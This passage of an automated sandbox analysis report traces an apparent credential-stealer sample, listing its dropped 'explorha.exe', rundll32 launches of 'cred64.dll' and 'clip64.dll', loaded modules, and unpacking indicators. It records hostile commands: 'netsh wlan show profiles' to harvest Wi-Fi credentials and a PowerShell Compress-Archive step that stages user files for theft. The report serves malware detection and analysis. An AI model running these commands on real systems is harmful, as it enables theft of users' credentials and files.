                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeString found in binary or memory: %RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeR
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, MainJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, MainJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, MainJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic file information: File size 3010048 > 1048576
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: Raw size of qatcqnjl is bigger than: 0x100000 < 0x2aca00
                                Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr, cred64.dll.6.dr

                                Data Obfuscation

                                barindex
                                Detected unpacking (changes PE section rights)
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeUnpacked PE file: 1.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeUnpacked PE file: 2.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeUnpacked PE file: 6.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: real checksum: 0x2e742d should be: 0x2e4b35
                                Source: cred64[1].dll.6.drStatic PE information: real checksum: 0x0 should be: 0x147ee8
                                Source: explorha.exe.0.drStatic PE information: real checksum: 0x2e742d should be: 0x2e4b35
                                Source: clip64.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x1f783
                                Source: clip64[1].dll.6.drStatic PE information: real checksum: 0x0 should be: 0x1f783
                                Source: cred64.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x147ee8
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: section name:
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: section name: .idata
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: section name: qatcqnjl
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: section name: zabsvnpb
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: section name: .taggant
                                Source: explorha.exe.0.drStatic PE information: section name:
                                Source: explorha.exe.0.drStatic PE information: section name: .idata
                                Source: explorha.exe.0.drStatic PE information: section name: qatcqnjl
                                Source: explorha.exe.0.drStatic PE information: section name: zabsvnpb
                                Source: explorha.exe.0.drStatic PE information: section name: .taggant
                                Source: cred64[1].dll.6.drStatic PE information: section name: _RDATA
                                Source: cred64.dll.6.drStatic PE information: section name: _RDATA
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E229A0 push esp; ret 0_2_00E229A1
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E19420 push ebx; ret 0_2_00E1942A
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E18DE6 push esi; iretd 0_2_00E18DE7
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E2EFBC push ecx; ret 0_2_00E2EFCF
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_0086C0E8 push cs; retn 0002h1_2_0086C0E9
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_00869420 push ebx; ret 1_2_0086942A
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_00868DE6 push esi; iretd 1_2_00868DE7
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_0087EFBC push ecx; ret 1_2_0087EFCF
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0086C0E8 push cs; retn 0002h2_2_0086C0E9
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00869420 push ebx; ret 2_2_0086942A
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00868DE6 push esi; iretd 2_2_00868DE7
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0087EFBC push ecx; ret 2_2_0087EFCF
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_0089F4FB push ss; iretd 6_2_0089F4FC
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_0087F666 push ecx; ret 6_2_0087F679
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_0087EFBC push ecx; ret 6_2_0087EFCF
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: section name: entropy: 7.982348024472177
